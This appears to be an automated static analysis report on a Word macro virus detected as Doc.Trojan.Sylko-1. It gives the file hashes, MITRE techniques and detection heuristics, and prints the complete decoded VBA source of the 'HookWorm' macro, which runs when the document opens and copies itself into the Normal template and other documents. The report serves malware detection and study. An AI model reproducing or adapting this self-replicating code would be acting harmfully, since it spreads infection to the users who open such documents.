Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bcf4e829ad47cc8e…

MALICIOUS

Office (OLE)

30.5 KB Created: 1999-12-03 00:52:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 010368e760c36c450b5e113b7154d0ca SHA-1: 026a9bb9dd72ed24b754a65352b1fde1104c8f79 SHA-256: bcf4e829ad47cc8e1ef349da10cc1dd0aa206516688ab8c861e370ade8cdb86e
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a macro named 'HookWorm' within a module named 'ThisDocument'. This macro is designed to execute automatically via the 'Document_Open' event, indicating an attempt to infect the Normal.dot template. The presence of the 'Document_Open' macro and the detection of 'Doc.Trojan.Sylko-1' strongly suggest malicious intent.

Heuristics 3

  • ClamAV: Doc.Trojan.Sylko-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Sylko-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1750 bytes
SHA-256: c63792c4b9e30343df7525eb56090748f067cff55a964995022de617b0db014d
Detection
ClamAV: Doc.Trojan.Sylko-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub HookWorm()
Dim Target As Object
Options.VirusProtection = Yes
Options.SaveNormalPrompt = Yes
Options.ConfirmConversions = Yes
If ThisDocument = NormalTemplate Then Set Target = ActiveDocument Else Set Target = NormalTemplate
For X = 1 To ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If UCase(ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(X, 1)) = "PRIVATE SUB HOOKWORM()" Then
HW = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(X, 27)
GoTo Continue
End If
Next
Continue:
For Y = 1 To Target.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If UCase(Target.VBProject.VBComponents.Item(1).CodeModule.Lines(Y, 1)) = "PRIVATE SUB HOOKWORM()" Then GoTo Finish
Next
For Z = 1 To Target.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If UCase(Target.VBProject.VBComponents.Item(1).CodeModule.Lines(Z, 1)) = "PRIVATE SUB DOCUMENT_OPEN()" Then
Target.VBProject.VBComponents.Item(1).CodeModule.InsertLines Z + 1, "Call HookWorm"
Target.VBProject.VBComponents.Item(1).CodeModule.AddFromString HW
GoTo Finish
End If
Next
Target.VBProject.VBComponents.Item(1).CodeModule.InsertLines Target.VBProject.VBComponents.Item(1).CodeModule.CountOfLines + 1, "Private Sub Document_Open()" & Chr(13) & Chr(10) & "Call HookWorm" & Chr(13) & Chr(10) & "End Sub"
Target.VBProject.VBComponents.Item(1).CodeModule.AddFromString HW
Finish:
End Sub 'HookWorm By Lys Kovick
Private Sub Document_Open()
Call HookWorm
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.